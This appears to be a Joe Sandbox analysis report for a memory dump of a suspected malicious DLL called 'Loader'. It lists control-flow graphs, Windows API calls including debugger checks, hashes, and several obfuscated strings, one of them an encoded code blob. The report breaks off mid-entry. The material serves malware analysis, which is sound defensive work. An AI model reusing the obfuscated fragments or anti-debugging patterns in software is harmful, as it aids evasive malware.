                                                                  control_flow_graph 1304 6d7de8f8-6d7de909 call 6d7dee80 1307 6d7de90b-6d7de911 1304->1307 1308 6d7de91a-6d7de921 1304->1308 1307->1308 1309 6d7de913-6d7de915 1307->1309 1310 6d7de92d-6d7de941 dllmain_raw 1308->1310 1311 6d7de923-6d7de926 1308->1311 1312 6d7de9f3-6d7dea02 1309->1312 1314 6d7de9ea-6d7de9f1 1310->1314 1315 6d7de947-6d7de958 dllmain_crt_dispatch 1310->1315 1311->1310 1313 6d7de928-6d7de92b 1311->1313 1316 6d7de95e-6d7de970 call 6d7ca4b0 1313->1316 1314->1312 1315->1314 1315->1316 1319 6d7de999-6d7de99b 1316->1319 1320 6d7de972-6d7de974 1316->1320 1322 6d7de99d-6d7de9a0 1319->1322 1323 6d7de9a2-6d7de9b3 dllmain_crt_dispatch 1319->1323 1320->1319 1321 6d7de976-6d7de994 call 6d7ca4b0 call 6d7de848 dllmain_raw 1320->1321 1321->1319 1322->1314 1322->1323 1323->1314 1325 6d7de9b5-6d7de9e7 dllmain_raw 1323->1325 1325->1314
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                  • String ID:
                                                                  • API String ID: 3136044242-0
                                                                  • Opcode ID: 1b553db9c42d1b41f745a0f7b77c2289fb49fd49250aa7558d2ef37d0ea1bd95
                                                                  • Instruction ID: b163682a9954201e41e801ff2badfbfa82ba8d9805ed95b5ff7d7b2818729350
                                                                  • Opcode Fuzzy Hash: 1b553db9c42d1b41f745a0f7b77c2289fb49fd49250aa7558d2ef37d0ea1bd95
                                                                  • Instruction Fuzzy Hash: 5B2196B1D0661EAFDBE34E54CA44E7FBA69EB80AB4B014026F958D7210C7708D018BE3

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 6D7E5F43
                                                                    • Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D7E5F7B
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D7E5F9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 158306478-0
                                                                  • Opcode ID: 7f52a6e37b237b1b8198ee5ab9dccb6858dced60605eb0f29157c9ea8d478ce5
                                                                  • Instruction ID: e60a14b622fe82f0cba7a5402028de5f42312d49566649a060db18884b6ed36b
                                                                  • Opcode Fuzzy Hash: 7f52a6e37b237b1b8198ee5ab9dccb6858dced60605eb0f29157c9ea8d478ce5
                                                                  • Instruction Fuzzy Hash: D1118EE690D62A7EAB0116756E8DD7FA9ACEE863F97110425F600D5100EB34CD0182B7

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1356 6d7de741-6d7de74f call 6d7dee80 call 6d7de4ad 1360 6d7de754-6d7de757 1356->1360 1361 6d7de75d-6d7de775 call 6d7de3b2 1360->1361 1362 6d7de82e 1360->1362 1366 6d7de77b-6d7de78c call 6d7de40f 1361->1366 1367 6d7de840-6d7de847 call 6d7ded57 1361->1367 1364 6d7de830-6d7de83f 1362->1364 1372 6d7de78e-6d7de7b0 call 6d7deff9 call 6d7defb2 call 6d7defd6 call 6d7e3ecc 1366->1372 1373 6d7de7db-6d7de7e9 call 6d7de824 1366->1373 1372->1373 1392 6d7de7b2-6d7de7b9 call 6d7de3e4 1372->1392 1373->1362 1378 6d7de7eb-6d7de7f5 call 6d7deff3 1373->1378 1384 6d7de7f7-6d7de800 call 6d7de56d 1378->1384 1385 6d7de816-6d7de81f 1378->1385 1384->1385 1391 6d7de802-6d7de814 1384->1391 1385->1364 1391->1385 1392->1373 1396 6d7de7bb-6d7de7d8 call 6d7e3ea1 1392->1396 1396->1373
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6D7DE78E
                                                                    • Part of subcall function 6D7DEFB2: InitializeSListHead.KERNEL32(6D846CF8,6D7DE798,6D7F2470,00000010,6D7DE729,?,?,?,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8), ref: 6D7DEFB7
                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D7DE7F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                  • String ID:
                                                                  • API String ID: 3231365870-0
                                                                  • Opcode ID: c6661d3fbcd7b32770178d34541d70028f3051983780cf5d72e0bf228bf2e394
                                                                  • Instruction ID: 247c318e3654fa8ad4f8a77edb6e5bc1a5b6b177af235c142b669528e6daf159
                                                                  • Opcode Fuzzy Hash: c6661d3fbcd7b32770178d34541d70028f3051983780cf5d72e0bf228bf2e394
                                                                  • Instruction Fuzzy Hash: B421323250D35A9EDB936BB487097BDBBA19F0627DF25042AD6E0EB1C2CB710141C6A3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1399 6d7e6e64-6d7e6e70 1400 6d7e6ea2-6d7e6ead call 6d7e4970 1399->1400 1401 6d7e6e72-6d7e6e74 1399->1401 1409 6d7e6eaf-6d7e6eb1 1400->1409 1402 6d7e6e8d-6d7e6e9e RtlAllocateHeap 1401->1402 1403 6d7e6e76-6d7e6e77 1401->1403 1405 6d7e6e79-6d7e6e80 call 6d7e77f3 1402->1405 1406 6d7e6ea0 1402->1406 1403->1402 1405->1400 1411 6d7e6e82-6d7e6e8b call 6d7e3df8 1405->1411 1406->1409 1411->1400 1411->1402
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,6D7E5843,?,?,6D7E5843,00000220,?,00000000,?), ref: 6D7E6E96
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 32ec0667700a42db22a7d160a44e94e1af429eeaa6ec005c3e0197386c39e1e8
                                                                  • Instruction ID: 7d5ba6389f9b6cd0ad95f388720754e4a21367a496d9ed58d2f08118c590b71a
                                                                  • Opcode Fuzzy Hash: 32ec0667700a42db22a7d160a44e94e1af429eeaa6ec005c3e0197386c39e1e8
                                                                  • Instruction Fuzzy Hash: B0E065216442665BEF112EA6DF0876F7668BF427F0F55493AAF14A61D0CB60DE0082E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: yAQ$yAQ
                                                                  • API String ID: 0-801701766
                                                                  • Opcode ID: 0ce0685397c6ae20e188f4f3321cf4eee133a43dce1fdde976f30674eb954822
                                                                  • Instruction ID: 93c137d30d7fb8443b89031863d4be39c5e3a26e13edcc8e00773ed6479da511
                                                                  • Opcode Fuzzy Hash: 0ce0685397c6ae20e188f4f3321cf4eee133a43dce1fdde976f30674eb954822
                                                                  • Instruction Fuzzy Hash: F7611872E545068FDB05CE7CCA853DE77F1AB46330F14C225D411DB344C6369A4ACB92
                                                                  Strings
                                                                  • //8zMzMzMzMzMzMzMzMzMVVNXVoPsKLj/////hckPhNkDAACLcQROg/4FD4fMAwAAi3wkRIl8JBiLfCRA/yS1dGlEALgEAAAAhdIPhKwDAADHAm51bGzGQgQA6Z0DAACLcQiF9g+EQQEAAItOCIXSD4RAAQAAZscCWwCJ+I16AcdEJBAAAAAAuwEAAACFwA+VRCQED4Q2AQAAhckPhC4BAABmx0IBCgCDwgLGRCQEAbsCAAAAidewAYlEJBDpFgEAAN1, xrefs: 6D7BD84F, 6D7BDC95
                                                                  • +[.y, xrefs: 6D7BDD85
                                                                  • vjjbylzahowdkllnhnpafbydrvngntyb, xrefs: 6D7BD9E5
                                                                  • +[.y, xrefs: 6D7BDD2F
                                                                  • gzfouwijrnbiqfjq, xrefs: 6D7BD9A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +[.y$+[.y$//8zMzMzMzMzMzMzMzMzMVVNXVoPsKLj/////hckPhNkDAACLcQROg/4FD4fMAwAAi3wkRIl8JBiLfCRA/yS1dGlEALgEAAAAhdIPhKwDAADHAm51bGzGQgQA6Z0DAACLcQiF9g+EQQEAAItOCIXSD4RAAQAAZscCWwCJ+I16AcdEJBAAAAAAuwEAAACFwA+VRCQED4Q2AQAAhckPhC4BAABmx0IBCgCDwgLGRCQEAbsCAAAAidewAYlEJBDpFgEAAN1$gzfouwijrnbiqfjq$vjjbylzahowdkllnhnpafbydrvngntyb
                                                                  • API String ID: 0-2863910153
                                                                  • Opcode ID: 4ef30be61cb9ae04d050181d02ca3b6ac281671e8db15cfcd84ef05e46135407
                                                                  • Instruction ID: 6936817734ca8acf4b480406dd5f257ab7e2b17c21c895052a650452432fd13d
                                                                  • Opcode Fuzzy Hash: 4ef30be61cb9ae04d050181d02ca3b6ac281671e8db15cfcd84ef05e46135407
                                                                  • Instruction Fuzzy Hash: E702D575654B018FC725CE3CC6947977BF2BB86320B048A1ED5A38BA94C735E409CB86
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D7DED63
                                                                  • IsDebuggerPresent.KERNEL32 ref: 6D7DEE2F
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D7DEE48
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6D7DEE52
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: 1212288e7f32a4a049fddb2c0f7cb3e52530795a1e474ec9e00420e6cb01e25a
                                                                  • Instruction ID: 85ad864ed2ec583c882f841dbfcdfdd9f9df791d533bb1ef5654a811326a5345
                                                                  • Opcode Fuzzy Hash: 1212288e7f32a4a049fddb2c0f7cb3e52530795a1e474ec9e00420e6cb01e25a
                                                                  • Instruction Fuzzy Hash: 453116B5D0531DDBDF61DFA0C9497CDBBB8AF08300F1041AAE54CAB250EB719A848F46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: vector too long
                                                                  • API String ID: 0-2873823879
                                                                  • Opcode ID: 22bd9731f894bbb341c5669146e2429b84ef5f0d1f161f07ed919a269946c052
                                                                  • Instruction ID: 065ef7ea8d6688eea6fc7ea04be91f6fe364ff670ffcf2b525d03800aece40c2
                                                                  • Opcode Fuzzy Hash: 22bd9731f894bbb341c5669146e2429b84ef5f0d1f161f07ed919a269946c052
                                                                  • Instruction Fuzzy Hash: CA512A32E501168FCB45CA7CC699BEE7BF2BB56334F119626C8619B381C3268909C797
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: U;j@$U;j@$\)[$jO3N
                                                                  • API String ID: 0-1053467548
                                                                  • Opcode ID: 5c9efe091d0733025bfa36551a7712c3aa8e18d0cc3816fb408ac71dccda067c
                                                                  • Instruction ID: 54757eae894f8314c322843639a7a2e4909b051bc2295dbb0c9a101d64bba8ef
                                                                  • Opcode Fuzzy Hash: 5c9efe091d0733025bfa36551a7712c3aa8e18d0cc3816fb408ac71dccda067c
                                                                  • Instruction Fuzzy Hash: 07A1D476A551068FDF05DEBCCA953EE7BF2BB46322F10851AC412D7354C6398A09CB93
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D7E2D95
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D7E2D9F
                                                                  • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6D7E2DAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 1a727727204c5d2cc6a20d38f15e96fccbcd62bdc90c3e279faf4a929fe5d626
                                                                  • Instruction ID: 4a9eda0164a886d0aab8e83bb00d7328dee111a3a9dda840d5126168f09056c6
                                                                  • Opcode Fuzzy Hash: 1a727727204c5d2cc6a20d38f15e96fccbcd62bdc90c3e279faf4a929fe5d626
                                                                  • Instruction Fuzzy Hash: C931F27490122D9BCB61DF24C9897DDBBB8BF08320F5041EAE51CA62A0E7709B85CF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: )$k)!$kkzvgcbsurflkpytybuomoevxtpltygyudjecinpfxskdlokkfsvvlvgqnmrm
                                                                  • API String ID: 0-4019164981
                                                                  • Opcode ID: f45214f2955e536035c0116192fff2d3df0983e8e01fbfc9cf82a7d9f1dfa081
                                                                  • Instruction ID: ec3ce4f0fcfdaa6cfc0841ec4995819017d0ee34a910cc71802c2a7abc9e8233
                                                                  • Opcode Fuzzy Hash: f45214f2955e536035c0116192fff2d3df0983e8e01fbfc9cf82a7d9f1dfa081
                                                                  • Instruction Fuzzy Hash: 3E32E1762582028FC705CE7CD68879A7BE2EBC7364F00DA1EE452DB294D635C94ACB47
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$G$kotnpbtbjstlxgelpivokyqdvxthaahacgqyrhqbjxycgjajumgwptnkrxdpszezzpumaq
                                                                  • API String ID: 0-1287920566
                                                                  • Opcode ID: 185a3019311271d82274c9f4a7abb0c0e5d86530a97bbf158c375ce7568010dc
                                                                  • Instruction ID: 196a8012c6f393121a20c286a0b8f03db154fbd57a16a691c7945170240736ac
                                                                  • Opcode Fuzzy Hash: 185a3019311271d82274c9f4a7abb0c0e5d86530a97bbf158c375ce7568010dc
                                                                  • Instruction Fuzzy Hash: 3002C172E542098FCB05CEBCC6D57DE7BF1BF56320F00951AD825AB298C275A909CF86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: >6'9$>6'9$`ID:
                                                                  • API String ID: 0-3243849139
                                                                  • Opcode ID: 4312bbe82304c645810d9f066de656113a909e7efb98378acf42be0efc0d07d0
                                                                  • Instruction ID: e15872de90b11335fae323156cce3525135d9e867c45fec202666ca55576c0f6
                                                                  • Opcode Fuzzy Hash: 4312bbe82304c645810d9f066de656113a909e7efb98378acf42be0efc0d07d0
                                                                  • Instruction Fuzzy Hash: A5E1D076E502059FCB48CEACDA947DDBBF2AB4A320F10D51AE824E7354C735994ACF42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: s.Mv$t52
                                                                  • API String ID: 0-2151687386
                                                                  • Opcode ID: 1b228b871034141729bf336701b627ce592c0e1490355f544f1b9bee3c603d7c
                                                                  • Instruction ID: 5d9ffda653528d315c6558a4c3412505bccc53eee879785b928ec2c4c3eb6ca3
                                                                  • Opcode Fuzzy Hash: 1b228b871034141729bf336701b627ce592c0e1490355f544f1b9bee3c603d7c
                                                                  • Instruction Fuzzy Hash: 61728C75A146048FCB44CFACCAD4AEEBBF2BB9A320F108529E516DB354D735AC05CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d08611b7462706d90024d5be261ce7ea67f04cd9012d1ade9099797289f1450
                                                                  • Instruction ID: cb380b4f3646eb9db7e52764cf1ba9e80ad95e2c9e47d194884620d570e76c90
                                                                  • Opcode Fuzzy Hash: 6d08611b7462706d90024d5be261ce7ea67f04cd9012d1ade9099797289f1450
                                                                  • Instruction Fuzzy Hash: 2F513932A601124FCF48DE3CCA983EE37F2AB46370F115619D924DF384C6268909CBD2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pm$Pm
                                                                  • API String ID: 0-614183269
                                                                  • Opcode ID: 7096872a666bc06beab6a6e9d60779b50c59d6007078f4d935be9c195bd97a32
                                                                  • Instruction ID: 2c01eb7bb002f05add51643f01b59e4dace93474a2851d7acee2234664a7dc95
                                                                  • Opcode Fuzzy Hash: 7096872a666bc06beab6a6e9d60779b50c59d6007078f4d935be9c195bd97a32
                                                                  • Instruction Fuzzy Hash: BD32A076E142558FCB05CEBCDA85BEE7BB2FB46322F10851AE811AB354D7359809CB43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /u|F$/u|F
                                                                  • API String ID: 0-791141198
                                                                  • Opcode ID: 85775837f0996a718b0f5180d82b3b7b5245fc90dca0fca024b1f421a54e0c74
                                                                  • Instruction ID: 44422542044f3f3278cb75296cfbbb9a94b8bb88ba12e8703eea8fab1d1c5725
                                                                  • Opcode Fuzzy Hash: 85775837f0996a718b0f5180d82b3b7b5245fc90dca0fca024b1f421a54e0c74
                                                                  • Instruction Fuzzy Hash: 0622D076E502098FCB05CEACD6957EE7BF2BB86330F108529E811DB394D6359949CB42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
